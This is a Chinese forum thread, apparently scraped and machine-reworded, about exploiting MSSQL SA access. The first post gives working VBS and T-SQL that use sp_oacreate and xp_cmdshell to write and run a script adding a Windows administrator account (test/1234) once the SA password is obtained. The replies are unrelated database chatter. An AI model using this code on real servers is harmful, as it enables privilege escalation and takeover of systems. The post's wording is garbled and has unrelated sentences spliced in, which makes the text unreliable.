仓酷云

标题: MSSQL网页编程之Microsoft SQL Server SA权限平安 [打印本页]

作者: 乐观    时间: 2015-1-16 22:15
标题: MSSQL网页编程之Microsoft SQL Server SA权限平安
由MySQL用来存储数据的文件格式以已经被广泛地测试过,但是总是有外部情况可以导致数据库表被破坏:在取得SA暗码后,常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用,没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具,用来办理当地资本,使用它能够不依托CMD等命令就可以增加一个办理员,详细代码以下:</p>在取得SA暗码后,常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用,没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具,用来办理当地资本,使用它能够不依托CMD等命令就可以增加一个办理员,详细代码以下:

  setwsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName
  Setob=GetObject(os)失掉adsi接口,绑定
  Setoe=GetObject(os&"/Administrators,group")属性,admin组
  Setod=ob.Create("user","test")创建用户
  od.SetPassword"1234"设置暗码
  od.SetInfo保留
  Setof=GetObject(os&"/test",user)失掉用户
  oe.addos&"/test"

  将下面的代码保留为1.vbs,然后实行,命令为“cscript1.vbs”,如许就会在体系增加一个体系名为test,暗码为1234的用户。详细在查询剖析器实行的代码以下:

  declare@oint,@fint,@tint,@retint
  execsp_oacreatescripting.filesystemobject,@oout
  execsp_oamethod@o,createtextfile,@fout,c:1.vbs,1
  exec@ret=sp_oamethod@f,writeline,NULL,setwsnetwork=CreateObject("WSCRIPT.NETWORK")
  exec@ret=sp_oamethod@f,writeline,NULL,os="WinNT://"&wsnetwork.ComputerName
  exec@ret=sp_oamethod@f,writeline,NULL,Setob=GetObject(os)
  exec@ret=sp_oamethod@f,writeline,NULL,Setoe=GetObject(os&"/Administrators,group")
  exec@ret=sp_oamethod@f,writeline,NULL,Setod=ob.Create("user","test")
  exec@ret=sp_oamethod@f,writeline,NULL,od.SetPassword"1234"
  exec@ret=sp_oamethod@f,writeline,NULL,od.SetInfo
  exec@ret=sp_oamethod@f,writeline,NULL,Setof=GetObject(os&"/test",user)
  exec@ret=sp_oamethod@f,writeline,NULL,oe.addos&"/test"

  实行完下面的语句,再实行上面这行代码,这行代码必定独自实行,不要与下面的放在一同实行,不然会提醒“c:1.vbs正被另外一个程序运转”而没法乐成增加用户:

  execmaster..xp_cmdshellcscriptc:1.vbs

  假如体系用户没有增加乐成,有多是由于体系用户的暗码1234的太复杂,不切合服务器的庞大暗码战略,能够思索设置的庞大些,然后再测试一下。也能够利用echo将代码写到1.vbs中,代码格局为:

  execmaster..xp_cmdshellechosetwsnetwork=CreateObject("WSCRIPT.NETWORK")>>1.vbs
对于insert操作,只需要把event_type改成DELETE_ROWS_EVENT;对于delete操作,改成WRITE_ROWS_EVENT
作者: 若天明    时间: 2015-1-26 22:39
是要和操作系统进行Socket通讯的场景。否则建议慎重!
作者: 谁可相欹    时间: 2015-2-4 22:35
这一点很好的加强了profiler的功能。但是提到profiler提醒大家注意一点。windows2003要安装sp1补丁才能启动profiler。否则点击没有反应。
作者: 再见西城    时间: 2015-2-10 22:04
一个百万级别的基本信息表A,一个百万级别的详细记录表B,A中有个身份证id,B中也有身份id;先要找出A中在B的详细记录。
作者: 简单生活    时间: 2015-3-1 16:44
索引视图2k就有。但是2005对其效率作了一些改进但是schema.viewname的作用域真是太限制了它的应用面。还有一大堆的环境参数和种种限制都让人对它有点却步。
作者: 若相依    时间: 2015-3-10 21:16
连做梦都在想页面结构是怎么样的,绝非虚言
作者: 老尸    时间: 2015-3-17 10:20
很多书籍啊,不过个人认为看书太慢,还不如自己学。多做实际的东西,就会遇到很多问题,网上搜下解决问题。不断重复这个过程,在配合sql的F1功能。
作者: 精灵巫婆    时间: 2015-3-24 07:39
只能告诉你,学好数据库语言和原理,多见识几种数据库软件,比一棵树上吊死要好。




欢迎光临 仓酷云 (http://ckuyun.com/) Powered by Discuz! X3.2